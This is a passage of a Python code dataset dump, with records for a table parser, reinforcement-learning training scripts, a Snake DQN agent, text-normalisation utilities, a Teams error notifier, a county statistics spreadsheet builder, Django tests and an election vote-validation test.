csv.reader(files.read().splitlines())\n try:\n data = [part for part in data] \n except:\n return 'Not a CSV'\n return data\n\ndef parse_html(html):\n table_soup = BeautifulSoup(html, \"html.parser\")\n r = table_soup.find('tbody').findAll('tr')\n h = table_soup.find('thead').findAll('th')\n return {\"rows\": r, \"header\":h}\n\ndef create_response(data, column_names, sort):\n df = pd.DataFrame(data, columns=column_names)\n if sort:\n df = df.sort(['MPN'])\n unique = df['MPN'].unique().tolist()\n html_table = df.to_html(classes=[\"table\", \"table-striped\", \"table-condensed\"], index=False)\n return {\"html\": html_table, \"unique_mpn\": unique}\n\ndef get_html_text(parsed_html_rows):\n table = []\n for row in parsed_html_rows: \n list_of_data = row.get_text().split(\"\\n\")\n del list_of_data[0]\n list_of_data.pop()\n table.append(list_of_data)\n return table ","sub_path":"tempo_build/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"6229082","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Edward Ahn & Jiyuan Zhou\n\nTrain local planner using TRPO so that a vehicle can follow a\nstraight line.\n\"\"\"\n\nimport numpy as np\n\nfrom rllab.algos.trpo import TRPO\nfrom rllab.baselines.linear_feature_baseline import LinearFeatureBaseline\nfrom rllab.envs.base import Env\nfrom rllab.envs.normalized_env import normalize\nfrom rllab.misc import logger\nfrom rllab.misc.instrument import run_experiment_lite, VariantGenerator\nfrom rllab.misc.resolve import load_class\nfrom rllab.policies.gaussian_mlp_policy import GaussianMLPPolicy\n\nfrom aa_simulation.envs.straight_env import StraightEnv\n\n\ndef run_task(vv, log_dir=None, exp_name=None):\n\n # Load environment\n target_velocity = vv['target_velocity']\n env = normalize(StraightEnv(target_velocity))\n\n # Save variant information for comparison plots\n variant_file = logger.get_snapshot_dir() + '/variant.json'\n logger.log_variant(variant_file, vv)\n\n # Train policy using TRPO\n policy = GaussianMLPPolicy(\n env_spec=env.spec,\n hidden_sizes=(32, 32)\n )\n baseline = LinearFeatureBaseline(env_spec=env.spec)\n algo = TRPO(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=1000,\n max_path_length=env.horizon,\n n_itr=800,\n discount=0.99,\n step_size=0.01,\n plot=False,\n )\n algo.train()\n\n\ndef main():\n\n # Set up multiple experiments at once\n vg = VariantGenerator()\n vg.add('target_velocity', [0.7])\n vg.add('seed', [100])\n print('Number of Configurations: ', len(vg.variants()))\n\n # Run each experiment variant\n for vv in vg.variants():\n run_experiment_lite(\n stub_method_call=run_task,\n variant=vv,\n n_parallel=1,\n snapshot_mode='last',\n seed=vv['seed']\n )\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train/train_straight_planner.py","file_name":"train_straight_planner.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"59388556","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nimport random\nimport os\nimport pygame\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom operator import add\nfrom collections import deque\n\nfrom snake_ai import game_ai\n\n#random.seed(9001)\n\n#NETWORK: input size = 11, hidden size = 256, output size = 3\nclass QNet(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super().__init__()\n self.linear1 = nn.Linear(input_size, hidden_size)\n self.linear2 = nn.Linear(hidden_size, output_size)\n def forward(self, x):\n x = F.relu(self.linear1(x))\n x = self.linear2(x)\n return x\n\nclass DQNAgent_train(object):\n def __init__(self):\n self.gamma = 0.9\n self.epsilon = 0\n self.counter_games = 0\n #replay memory D\n self.memory = deque()\n #action-value function Q \n self.model = QNet(11, 256, 3)\n self.model.train()\n\n #https://arxiv.org/abs/1412.6980 Adam: A Method for Stochastic Optimization\n self.optimizer = optim.Adam(self.model.parameters(), lr=0.001)\n\n self.loss_fn = nn.MSELoss()\n\n def get_state(self, snake):\n state = [\n # immediate danger for snake straight, right, or left\n (snake.x_change == 20 and snake.y_change == 0 and ((list(map(add, snake.snakeSegments[0], [20, 0])) in snake.snakeSegments) or snake.snakeSegments[0][0] + 20 >= (snake.display_width - 20))) or \n (snake.x_change == -20 and snake.y_change == 0 and ((list(map(add, snake.snakeSegments[0], [-20, 0])) in snake.snakeSegments) or snake.snakeSegments[0][0] - 20 < 20)) or \n (snake.x_change == 0 and snake.y_change == -20 and ((list(map(add, snake.snakeSegments[0], [0, -20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] - 20 < 20)) or \n (snake.x_change == 0 and snake.y_change == 20 and ((list(map(add, snake.snakeSegments[0], [0, 20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] + 20 >= (snake.display_height-20))),\n\n (snake.x_change == 0 and snake.y_change == -20 and ((list(map(add,snake.snakeSegments[0],[20, 0])) in snake.snakeSegments) or snake.snakeSegments[0][0] + 20 > (snake.display_width-20))) or \n (snake.x_change == 0 and snake.y_change == 20 and ((list(map(add,snake.snakeSegments[0],[-20,0])) in snake.snakeSegments) or snake.snakeSegments[0][0] - 20 < 20)) or \n (snake.x_change == -20 and snake.y_change == 0 and ((list(map(add,snake.snakeSegments[0],[0,-20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] - 20 < 20)) or \n (snake.x_change == 20 and snake.y_change == 0 and ((list(map(add,snake.snakeSegments[0],[0,20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] + 20 >= (snake.display_height-20))),\n\n (snake.x_change == 0 and snake.y_change == 20 and ((list(map(add,snake.snakeSegments[0],[20,0])) in snake.snakeSegments) or snake.snakeSegments[0][0] + 20 > (snake.display_width-20))) or \n (snake.x_change == 0 and snake.y_change == -20 and ((list(map(add, snake.snakeSegments[0],[-20,0])) in snake.snakeSegments) or snake.snakeSegments[0][0] - 20 < 20)) or \n (snake.x_change == 20 and snake.y_change == 0 and ((list(map(add,snake.snakeSegments[0],[0,-20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] - 20 < 20)) or \n (snake.x_change == -20 and snake.y_change == 0 and ((list(map(add,snake.snakeSegments[0],[0,20])) in snake.snakeSegments) or snake.snakeSegments[0][-1] + 20 >= (snake.display_height-20))),\n\n # direction snake is currently moving\n snake.x_change == -20, \n snake.x_change == 20, \n snake.y_change == -20, \n snake.y_change == 20,\n\n # fruit location \n snake.fruitPosition[0] < snake.snakePosition[0], # food left\n snake.fruitPosition[0] > snake.snakePosition[0], # food right\n snake.fruitPosition[1] < snake.snakePosition[1], # food up\n snake.fruitPosition[1] > snake.snakePosition[1] # food down\n ]\n\n for i in range(len(state)):\n if state[i]:\n state[i]=1\n else:\n state[i]=0\n\n return np.asarray(state)\n\n def remember(self, state, action, reward, next_state, done):\n self.memory.append([state, action, reward, next_state, done])\n if len(self.memory) > 100000:\n self.memory.popleft()\n\n def replay_memory(self, memory):\n self.counter_games += 1\n if len(memory) > 1000:\n minibatch = random.sample(memory, 1000)\n else:\n minibatch = memory\n \n state, action, reward, next_state, done = zip(*minibatch)\n state = torch.tensor(state, dtype=torch.float) #[1, ... , 0]\n action = torch.tensor(action, dtype=torch.long) # [1, 0, 0]\n reward = torch.tensor(reward, dtype=torch.float) # int\n next_state = torch.tensor(next_state, dtype=torch.float) #[True, ... , False]\n target = reward\n # target = reward + self.gamma * torch.max(self.model(next_state), dim=1)[0]\n if not done:\n target = reward + self.gamma * torch.max(self.model(next_state))\n\n #optimize\n location = [[x] for x in torch.argmax(action, dim=1).numpy()]\n location = torch.tensor(location)\n pred = self.model(state).gather(1, location)#[action]\n pred = pred.squeeze(1)\n loss = self.loss_fn(target, pred)\n loss.backward()\n self.optimizer.step()\n\n def train_short_memory(self, state, action, reward, next_state, done):\n state = torch.tensor(state, dtype=torch.float)\n next_state = torch.tensor(next_state, dtype=torch.float)\n action = torch.tensor(action, dtype=torch.long)\n reward = torch.tensor(reward, dtype=torch.float)\n target = reward\n\n if not done:\n target = reward + self.gamma * torch.max(self.model(next_state))\n\n #optimize\n pred = self.model(state)\n target_f = pred.clone()\n target_f[torch.argmax(action).item()] = target\n\n loss = self.loss_fn(target_f, pred)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n def plot(self, score, mean_per_game):\n from IPython import display\n display.clear_output(wait=True)\n display.display(plt.gcf())\n plt.clf()\n plt.title('Training Results')\n plt.xlabel('Number of Games')\n plt.ylabel('Score')\n plt.plot(score)\n plt.plot(mean_per_game)\n plt.ylim(ymin=0)\n plt.text(len(score)-1, score[-1], str(score[-1]))\n plt.text(len(mean_per_game)-1, mean_per_game[-1], str(mean_per_game[-1]))\n \n def get_action(self, state):\n self.epsilon = 80 - self.counter_games\n final_move = [0, 0, 0]\n if random.randint(0, 200) < self.epsilon:\n move = random.randint(0, 2)\n final_move[move] += 1\n else:\n state0 = torch.tensor(state, dtype=torch.float)\n prediction = self.model(state0)\n move = torch.argmax(prediction).item()\n final_move[move] += 1\n return final_move\n\n\n\ndef train():\n #will save the model for the game that gets the highest score\n save_model = False\n\n #have to set window caption in here lol idk why\n pygame.display.set_caption('SmartSnake')\n\n #make folder for saved models\n if save_model:\n if not os.path.exists('./model'):\n os.makedirs('./model')\n\n #setup for training\n\n #Turn the interactive mode on for pyplot\n plt.ion()\n\n #Initialize plotting values\n score_plot = []\n total_score = 0\n mean_plot =[]\n record = 0\n\n #initialize agent and environment\n agent = DQNAgent_train() #agent == snake\n game = game_ai() #enviroment == game/board/emulator\n\n #max number of games the agent will play while training\n max_games = 200\n\n while True:\n if agent.counter_games > max_games:\n exit(\"Max number of games reached\")\n\n #get old state\n state_old = agent.get_state(game)\n \n final_move = agent.get_action(state_old)\n\n #perform new move and get new state\n reward, done, score = game.frameStep(final_move)\n state_new = agent.get_state(game)\n \n #train short memory based on the new action and state\n agent.train_short_memory(state_old, final_move, reward, state_new, done)\n \n # store the new data into a long term memory\n agent.remember(state_old, final_move, reward, state_new, done)\n\n if done == True:\n # One game is over, train on the memory and plot the result.\n sc = game.reset()\n total_score += sc\n agent.replay_memory(agent.memory)\n\n #print what number game the snake is on and what the score is for the game\n print('Game', agent.counter_games, ' Score:', sc)\n\n #update record and save model if new high score \n #model from iteration w highest score saved as best_model.pth\n if sc > record:\n record = sc\n if save_model:\n dir = os.path.join('./model', 'best_model.pth')\n torch.save(agent.model.state_dict(), dir)\n\n print('record: ', record)\n #add plot points for current game: score and updated average\n score_plot.append(sc)\n mean = total_score / agent.counter_games\n mean_plot.append(mean)\n agent.plot(score_plot, mean_plot)\n\n plt.ioff()\n plt.show()\n\n\nif __name__ == '__main__':\n #load game icon and initialize pygame\n image = pygame.image.load('snake.png')\n pygame.display.set_icon(image)\n pygame.init()\n\n #call training function!!!!\n train()\n\n","sub_path":"deepQ_snake/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":9941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"247507371","text":"from pymorphy2 import MorphAnalyzer\nimport re\n\n\n# Объект для нормализации слов\nmorph = MorphAnalyzer()\n\n# Длина n-грамм\nn_gramm_value = 3\n\n# Максимально допустимое расстояние Дамерау-Левенштайна\nmaxDistanceInReplaceCheck = 1\n\n# Вероятность для найденных слов нечетким поиском по расстоянию Дамерау-Левенштайна\nprobabilityForFoundWordsInReplace = 1\n\n# Стоимость удаления символа\ndamerauDeleteCost = 1\n\n# Стоимость вставки символа\ndamerauInsertCost = 1\n\n# Стоимость замены символа\ndamerauReplaceCost = 1\n\n# Стоимость перестановки символов\ndamerauTransposeCost = 1\n\n\ndef normalize_hashtag(hashtag):\n \"\"\"\n Обработка вводимого хэштега, чтобы в нем остались только буквы\n Необходимо чтобы все хэштеги были в одной форме и их удобно было сравнивать между собой\n\n :param hashtag: вводимый хэштег\n :return: обработанный хэштег\n \"\"\"\n\n result = \"\".join(re.findall(r\"\\w*\", hashtag)).lower()\n return result\n\n\ndef normalize_word(word):\n \"\"\"\n Получение нормальной формы слова (например гуляла -> гулять)\n\n :param word: слово\n :return: нормальная форма слова\n \"\"\"\n\n result = morph.parse(word)[0].normal_form.lower()\n return result\n\n\ndef lemm_list(split_str):\n \"\"\"\n Получение списка нормализованных слов из списка слов\n\n :param split_str: список слов\n :return: список нормализованных слов\n \"\"\"\n\n lemm_list = []\n for el in split_str:\n lemm_list.append(normalize_word(el))\n return lemm_list\n\n\ndef make_n_gramms(input_str):\n \"\"\"\n Получение n-грамм из строки\n\n :param input_str: строка\n :return: список n-грамм\n \"\"\"\n\n result = []\n for i in range(n_gramm_value, len(input_str) + 1):\n result.append(input_str[i - n_gramm_value: i])\n\n return result\n\n\ndef get_words(hashtag):\n \"\"\"\n Разбивает строку на слова по пробелам, предварительно удаляя решетку\n\n :param hashtag: строка ввода\n :return: список слов\n \"\"\"\n\n hashtag = hashtag.replace(\"#\", \"\")\n\n return hashtag.split(\" \")\n\n\ndef damerau(s, t):\n \"\"\"\n Подсчет расстояния Дамерау-Левенштейна (расстояние с перестановкой)\n\n :param s: строка 1\n :param t: строка 2\n :return: расстояние между строками\n \"\"\"\n\n if s == t:\n return 0\n elif len(s) == 0:\n return len(t)\n elif len(t) == 0:\n return len(s)\n\n deleteCost = damerauDeleteCost\n insertCost = damerauInsertCost\n replaceCost = damerauReplaceCost\n transposeCost = damerauTransposeCost\n\n s = \" \" + s\n t = \" \" + t\n M = len(s)\n N = len(t)\n d = [list(range(N))]\n for i in range(1, M):\n d.append([])\n for j in range(N):\n d[i].append(0)\n d[i][0] = i\n\n for i in range(1, M):\n for j in range(1, N):\n # Стоимость замены\n if s[i] == t[j]:\n d[i][j] = d[i - 1][j - 1]\n else:\n d[i][j] = d[i - 1][j - 1] + replaceCost\n d[i][j] = min(\n d[i][j], # замена\n d[i - 1][j] + deleteCost, # удаление\n d[i][j - 1] + insertCost # вставка\n )\n\n if i > 1 and j > 1 and s[i] == t[j - 1] and s[i - 1] == t[j]:\n d[i][j] = min(\n d[i][j],\n d[i - 2][j - 2] + transposeCost # транспозиция\n )\n return d[M - 1][N - 1]\n\n\ndef get_result_by_damerau(word, dict_word):\n \"\"\"\n Линейный нечеткий поиск слова по словарю с использованием расстояния Дамерау-Левенштейна\n\n :param word: искомое слово\n :param dict_word: словарь, по которому выполняется поиск\n :return: расстояние между строками\n \"\"\"\n\n gramms_selection = {}\n for el in dict_word:\n for w in word:\n len = damerau(el, w)\n if len < 2:\n gramms_selection[w] = (2 - len) * 0.5\n\n return gramms_selection\n","sub_path":"scripts/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"6146307","text":"import pymsteams\nimport sys\nsys.path.insert(0, '<>')#change for config path\nimport config #imports variables from config.py file\n\ndef sendError(errorHook, service, date, error):\n #channel URL\n teamsURL = config.errorHook\n myTeamsMessage = pymsteams.connectorcard(teamsURL)\n myTeamsMessage.title(\"TEST REPORT ERROR FOR \" + str(service))\n myTeamsMessage.text(\"Test run at \" + str(date))\n #section with the up services\n myMessageSection = pymsteams.cardsection()\n myMessageSection.activityTitle(service)\n myMessageSection.activityText(str(error))\n myTeamsMessage.addSection(myMessageSection)\n myTeamsMessage.send()","sub_path":"methods/sendError.py","file_name":"sendError.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"98123552","text":"'''\nCounty Stats Upload\nKHESS 2018-11-8\n'''\n\nimport pandas as pd\nimport time\nimport re\nimport os\nimport sys\n\n\n#FILE LOCATION\n'''Home Directory''' #UPDATE THIS LOCATION FOR ALL FILES\ninputpath = '/Users/kellyhess/LGDR/CountyStatData/'\n\n'''\nfilenames notes\nallhlcn172.xlsx 17 is year, 2 is 2nd quarter\nCA1_1969_2016_SC.csv CA1 is table name\nlaucnty17.xlsx 17 is year\n'''\n\n#File targets -- UPDATE TO MATCH FILENAMES\ntargetfiles = {'empsectors' : 'allhlcn172.xlsx',\n 'persincome' : 'CA1_1969_2016_SC.csv',\n 'employment' : 'laucnty17.xlsx',\n 'population' : 'proj2020.csv'\n }\n\nworkbooktargets = { 'persincome' : { 'tab' : targetfiles['persincome'][:-4] + ' - Personal Inc',\n 'Description' : \"Personal income (thousands of dollars)\"\n },\n 'empsectors' : { 'tab' : 'US_St_Cn_MSA',\n 'tabcol' : 'June Employment',\n 'areatype' : 'County',\n 'stname' : 'South Carolina',\n 'ownership' : ['Private',\n 'Local Government',\n 'State Government',\n 'Federal Government']\n },\n 'population' : { 'tab' : targetfiles['population'][:-4],\n 'column' : 'July 1, 2018 Projection' #NEEDS TO BE UPDATED FOR YEAR!!\n },\n 'employment' : { 'tab' : targetfiles['employment'][:-5],\n 'columns' : [ 'County Name/State Abbreviation',\n 'Force',\n 'Employed',\n 'Unemployed',\n '(%)']\n }\n }\n\n#Make Ratings & CountySeat tabs\nRatings = pd.DataFrame(columns = ['County','FiscalYear','Moodys',\n 'Standard&Poors','DataDate'])\nCountySeat = pd.DataFrame({'County' : ['Abbeville',\n 'Aiken',\n 'Allendale',\n 'Anderson',\n 'Bamberg',\n 'Barnwell',\n 'Beaufort',\n 'Berkeley',\n 'Calhoun',\n 'Charleston',\n 'Cherokee',\n 'Chester',\n 'Chesterfield',\n 'Clarendon',\n 'Colleton',\n 'Darlington',\n 'Dillon',\n 'Dorchester',\n 'Edgefield',\n 'Fairfield',\n 'Florence',\n 'Georgetown',\n 'Greenville',\n 'Greenwood',\n 'Hampton',\n 'Horry',\n 'Jasper',\n 'Kershaw',\n 'Lancaster',\n 'Laurens',\n 'Lee',\n 'Lexington',\n 'Marion',\n 'Marlboro',\n 'Mccormick',\n 'Newberry',\n 'Oconee',\n 'Orangeburg',\n 'Pickens',\n 'Richland',\n 'Saluda',\n 'Spartanburg',\n 'Sumter',\n 'Union',\n 'Williamsburg',\n 'York'],\n 'CountySeat' : ['Abbeville',\n 'Aiken',\n 'Allendale',\n 'Anderson',\n 'Bamberg',\n 'Barnwell',\n 'Beaufort',\n 'Moncks Corner',\n 'St. Matthews',\n 'Charleston',\n 'Gaffney',\n 'Chester',\n 'Chesterfield',\n 'Manning',\n 'Walterboro',\n 'Darlington',\n 'Dillon',\n 'St. George',\n 'Edgefield',\n 'Winnsboro',\n 'Florence',\n 'Georgetown',\n 'Greenville',\n 'Greenwood',\n 'Hampton',\n 'Conway',\n 'Ridgeland',\n 'Camden',\n 'Lancaster',\n 'Laurens',\n 'Bishopville',\n 'Lexington',\n 'Marion',\n 'Bennettsville',\n 'McCormick',\n 'Newberry',\n 'Walhalla',\n 'Orangeburg',\n 'Pickens',\n 'Columbia',\n 'Saluda',\n 'Spartanburg',\n 'Sumter',\n 'Union',\n 'Kingstree',\n 'York']})\nCountySeat['DataDate'] = '08/15/2018'\n\n#DF STUFF\nproblemfiles = []\ncurdate = time.strftime('%m/%d/%Y')\nexportdate = time.strftime('%m-%d-%Y')\ncolumnorder = { 'persincome' : ['County','FiscalYear','PersonalIncome','DataDate'],\n 'population' : ['County','FiscalYear','Population','DataDate' ],\n 'empsectors' : ['County','FiscalYear','Sector','Value','DataDate'],\n 'employment' : ['County','FiscalYear','LaborForce','Employed','Unemployed','Rate','DataDate']\n }\ndfs2send = {}\n\n#FISCAL YEAR INPUT\nfiscYr = input('What fiscal year? MM/DD/YYYY')\nif len(fiscYr) < 10:\n fiscYr = '06/30/2018'\n\n#file error handling ... can't find\ndef read_file(file2open):\n if 'xls' in file2open:\n try:\n xlfile = pd.read_excel(file2open)\n return xlfile\n except:\n print (\"Can't read xls file \",file2open)\n problemfiles.append(file2open)\n elif 'csv' in file2open:\n try:\n csvfile = pd.read_csv(file2open)\n return csvfile\n except:\n print (\"Can't read csv file \",file2open)\n problemfiles.append(file2open)\n\n#filters ownership data for empsectors\ndef filter_ownership(x):\n if re.search(gardata, x['Area']): return False\n elif x['Ownership'] in workbooktargets['empsectors']['ownership']:\n #remove subtotals from Private Ownership\n if x['Ownership'] == 'Private':\n if re.search(indregex, x['Industry']):\n return True\n else: return False\n return True\n else: return False\n\ndef check_if_files_exist(file2open, expectedfile):\n if not os.path.isfile(file2open):\n print (\"Can't find file \",expectedfile,\". Check file targets against what's in directory\")\n sys.exit()\n\n\n#IMPORT AND WRANGLE\nfor target, targetfile in targetfiles.items():\n #print 'Target ', target\n print ('Reading ',targetfile)\n #build file path\n filepath = inputpath + targetfile\n\n #check filenames\n check_if_files_exist(filepath, targetfile)\n\n #read file\n df = read_file(filepath)\n\n if target == 'persincome':\n #find last column in df\n maxcol = len(df.columns)\n psincm = df.iloc[:,[1,6,(maxcol-1)]].dropna(how = 'any') #rows, column list\n\n #remove SC totals\n totalfilter = psincm['GeoName'].str.contains('South Carolina state total')\n psincm = psincm[~totalfilter] #tilde reverses T/F\n\n #remove all lines except personal Income\n perinfilter = psincm['Description'].str.contains(workbooktargets[target]['Description'], \\\n regex = False)\n psincm = psincm[perinfilter]\n\n #drop Description\n psincm = psincm.drop(['Description'], axis = 1)\n\n #normalize county names\n psincm = psincm.replace({'GeoName': r', SC'}, \\\n {'GeoName': ''}, regex = True)\n\n #rename columns\n psincm.columns = ['County', 'PersonalIncome']\n\n #add additional information\n psincm['FiscalYear'] = fiscYr\n psincm['DataDate'] = curdate\n\n #reorder columns\n PersonalIncome = psincm[columnorder[target]]\n\n #append to send\n dfs2send['PersonalIncome'] = PersonalIncome\n\n #print PersonalIncome.head()\n\n elif target == 'empsectors':\n #Subset for SC counties\n cdtemp = df[(df['Area Type'] == workbooktargets[target]['areatype']) & \\\n (df['St Name'] == workbooktargets[target]['stname'])]\n\n #Pick up columns for output\n cdtemp = cdtemp.iloc[:,[9,10,11,16]] #rows, columns\n\n #filters data for target ownership data, handles subtotals in private\n #removes unknown counties\n indregex = '^[0-9]{4}\\s' #begin with a 4 digit numeric\n gardata = 'Unknown'\n yasdata = cdtemp.apply(filter_ownership, axis = 1)\n countydata = cdtemp[yasdata]\n\n #remove numbers from Industry text\n #regex: beginning line characters repeating 0-9, 1 whitespace\n countydata = countydata.replace({'Industry': r'^[0-9]+\\s'}, \\\n {'Industry': ''}, regex = True)\n\n #remove County, South Carolina from Area\n countydata = countydata.replace({'Area': r'\\sCounty, South Carolina'}, \\\n {'Area': ''}, regex = True)\n\n #add fiscal year and export date\n countydata['FiscalYear'] = fiscYr\n countydata['DataDate'] = curdate\n\n #REFORMAT FOR OUTPUT\n #Govt\n exportgovt = countydata[(countydata['Ownership'] != 'Private')]\\\n .drop(['Industry'], axis = 1)\n exportgovt.columns = ['County','Sector','Value','FiscalYear','DataDate']\n exportgovt = exportgovt[columnorder[target]]\n\n #Private\n exportpriv = countydata[(countydata['Ownership'] == 'Private')]\\\n .drop(['Ownership'], axis = 1)\n exportpriv.columns = ['County','Sector','Value','FiscalYear','DataDate']\n exportpriv = exportpriv[columnorder[target]]\n\n #combine dfs\n DFS = [exportgovt, exportpriv]\n EmpSectors = pd.concat(DFS)\n\n #append df to send list // [tab name] = df\n dfs2send['EmploymentSectors'] = EmpSectors\n\n #print EmpSectors.head()\n\n elif target == 'population':\n #subset population projection, remove NANs\n Population = df.loc[:,['County',workbooktargets[target]['column']]]\\\n .dropna()\n #remove SC total\n Population = Population[Population['County'] != 'South Carolina']\n\n #rename columns\n Population.columns = ['County', 'Population']\n\n #add addtional columns\n Population['DataDate'] = curdate\n Population['FiscalYear'] = fiscYr\n\n #reorder columns\n Population = Population[columnorder[target]]\n\n #append to send\n dfs2send['Population'] = Population\n\n elif target == 'employment':\n #get target columns\n labor = df.iloc[5:,[1,3,6,7,8,9]].dropna()\n\n #get SC data\n labor = labor[labor.iloc[:,0] == '45']\n\n #drop state code\n labor = labor.drop(['Unnamed: 1'], axis = 1)\n\n #rename columns\n labor.columns = ['County','LaborForce','Employed','Unemployed',\n 'Rate']\n\n #normalize county names, removing suffix County, SC\n labor = labor.replace({'County' : r'\\sCounty, SC'}, \\\n {'County' : ''}, regex = True)\n\n #add additional info\n labor['FiscalYear'] = fiscYr\n labor['DataDate'] = curdate\n\n #reorder columns\n Employment = labor[columnorder[target]]\n\n #append to send\n dfs2send['Employment'] = Employment\n\n #add holder tabs\n dfs2send['Ratings'] = Ratings\n dfs2send['CountySeat'] = CountySeat\n\nprint ('Data wrangling complete!')\nprint ('Exporting...')\n#trim?\n\n#WRITE TO EXCEL\n#set tab order for writer\ntaborder = { 1 : 'Ratings',\n 2 : 'PersonalIncome',\n 3 : 'Population',\n 4 : 'EmploymentSectors',\n 5 : 'Employment',\n 6 : 'CountySeat'}\n\n#filename of output workbook\nwriter = pd.ExcelWriter(inputpath+'CountyStatsData_'+exportdate+'.xlsx')\n\n#write dfs to excel file\nfor key, targ in taborder.items():\n df = dfs2send.get(targ, 'Key not found.')\n print ('Writing ',targ)\n df.to_excel(writer, sheet_name = targ, index = False)\n'''\nfor key, df in dfs2send.items():\n df.to_excel(writer, sheet_name = key, index = False)\n'''\nwriter.save()\nwriter.close()\n\n\nprint ('Problem files: ',problemfiles)\nprint ('Complete!')\n","sub_path":"code/countystats_3.py","file_name":"countystats_3.py","file_ext":"py","file_size_in_byte":14808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"588301233","text":"from contextlib import contextmanager\nfrom django.conf import settings\nfrom django.test import TestCase\n\nfrom .factories import UserFactory\n\nclass ScenarioTestCase(TestCase):\n @contextmanager\n def log_user(self, user=None):\n if user is not None:\n self.client.login(username=user.username, password='password')\n try:\n yield\n finally:\n if user is not None:\n self.client.logout()\n\n @classmethod\n def setUpTestData(cls):\n cls.user1 = UserFactory.create()\n # Add here more users if needed\n\n def setUp(self):\n self.no_user_logged_in_scenario = cls.log_user(None)\n self.user1_logged_in_scenario = cls.log_user(self.user1)\n # Add here any other scenario you'd like\n","sub_path":"ispa/events/tests/test_setupdata.py","file_name":"test_setupdata.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"563294332","text":"from django.core import mail\nfrom django.test import TestCase\nfrom django.shortcuts import resolve_url as r\n\n\nclass SubscribePostValid(TestCase):\n\n def setUp(self):\n data = dict(name='Orlando Saboia', cpf='12345678901',\n email='fobs@bol.com.br', phone='86-12345-6789')\n\n self.resp = self.client.post(r('subscriptions:new'), data)\n self.email = mail.outbox[0]\n\n def test_subscription_email_subject(self):\n expect = 'Confirmacao de Inscricao'\n\n self.assertEqual(expect,self.email.subject)\n\n\n def test_subscription_email_from(self):\n expect = 'contato@eventex.com.br'\n self.assertEqual(expect, self.email.from_email)\n\n def test_subscription_email_to(self):\n expect = ['contato@eventex.com.br','fobs@bol.com.br']\n\n self.assertEqual(expect, self.email.to)\n\n def test_subscription_email_body(self):\n contents = [\n 'Orlando Saboia',\n '12345678901',\n 'fobs@bol.com.br',\n '86-12345-6789'\n ]\n for content in contents:\n with self.subTest():\n self.assertIn(content, self.email.body)\n\n","sub_path":"eventex/subscriptions/tests/test_mail_subscribe.py","file_name":"test_mail_subscribe.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"507570627","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nimport math as m\nX = [1., 2., 3.]\nY = [1., 2., 3.]\nm = n_samples = len(X)\n\nW = tf.exp(3.)\n\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nprint(sess.run(W))","sub_path":"lab5/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"249191213","text":"\"\"\"\nTests in standalone fashion the vote-validation interface\n\"\"\"\n\nimport pytest\nimport unittest\nimport json\nfrom copy import deepcopy\nfrom zeus_core.election.interfaces.vote_handlers import VoteValidator\nfrom zeus_core.election.exceptions import InvalidVoteError\nfrom tests.election.utils import display_json, adapt_vote\nfrom tests.election.makers import mk_voting_setup\n\n\nclass DummyVoteValidator(VoteValidator):\n \"\"\"\n Minimal implementation of vote validation interface for testing purposes\n \"\"\"\n def __init__(self, election):\n self.election = election\n self.cryptosys = election.get_cryptosys()\n\n def get_cryptosys(self):\n return self.cryptosys\n\n def get_crypto_params(self):\n return self.election.get_crypto_params()\n\n def get_election_key(self):\n return self.election.get_election_key()\n\n def get_candidates(self):\n return self.election.get_candidates()\n\n def get_audit_votes(self):\n return self.election.get_audit_votes()\n\n def extract_vote(self, vote):\n return self.election.extract_vote(vote)\n\n def serialize_encrypted_ballot(self, encrypted_ballot):\n serialized = self.election.serialize_encrypted_ballot(encrypted_ballot)\n return serialized\n\n def deserialize_encrypted_ballot(self, alpha, beta,\n commitment, challenge, response):\n deserialized = self.election.deserialize_encrypted_ballot(\n alpha, beta, commitment, challenge, response)\n return deserialized\n\n\nclass TestValidations(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n election = mk_voting_setup()\n\n cls.election = election\n cls.cryptosys = election.get_cryptosys()\n cls.validator = DummyVoteValidator(election)\n cls.voter = election.get_voter_clients()[0]\n cls.messages = []\n\n @classmethod\n def tearDownClass(cls):\n print('\\n')\n for message in cls.messages:\n print(message)\n\n\n def get_context(self):\n election = __class__.election\n cryptosys = __class__.cryptosys\n validator = __class__.validator\n voter = __class__.voter\n messages = __class__.messages\n\n return election, cryptosys, validator, voter, messages\n\n\n def __fail(self, err):\n __class__.messages.append(f'[-] {err}')\n self.fail(err)\n\n\n def test_vote_adaptment_success(self):\n _, cryptosys, validator, 